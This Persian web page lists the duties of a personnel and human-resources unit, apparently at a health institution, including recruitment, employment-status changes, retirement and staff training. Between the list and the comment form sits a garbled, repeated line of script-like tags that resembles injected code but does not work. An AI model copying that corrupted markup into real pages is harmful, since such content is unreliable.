شرح وظایف عملکرد

  • برنامه ریزی به منظور جذب و بکارگیری نیروی انسانی .
  • برنامه ریزی جهت تبدیل وضعیت استخدامی پرسنل از پیمانی به رسمی آزمایشی و رسمی قطعی .
  • برنامه ریزی در جهت تشکیل کمیته های نقل و انتقالات پرسنل .
  • برنامه ریزی جهت انجام امور پرسنل قراردادی .
  • انجام کلیه امور انتصابات پرسنل ( طبقه ، احتساب سنوات ، تغییر عنوان و … )
  • برنامه ریزی جهت بکارگیری و توزیع نیروی انسانی مشمول قانون خدمت پزشکان و پیراپزشکان ( طرحی ) و مشمولین خدمات قانونی و مورد تعهد ( ضریب k ) و پیام آوران بهداشت .
  • انجام امور بازنشستگی و وظیفه .
  • برنامه ریزی و هماهنگی با معاونت آموزشی در جهت انجام امور پرسنل هیات علمی .
  • برنامه ریزی و هماهنگی با واحدهای تابعه در جهت انجام کلیه امور ترفیعات پرسنل ، امور مرخصی و ماموریت و …
  • انجام امور آموزش ضمن خدمت کارکنان از طریق نیازسنجی آموزشی ضمن هماهنگی با وزارت متبوع .
<2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>

ارسال نظر شما

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *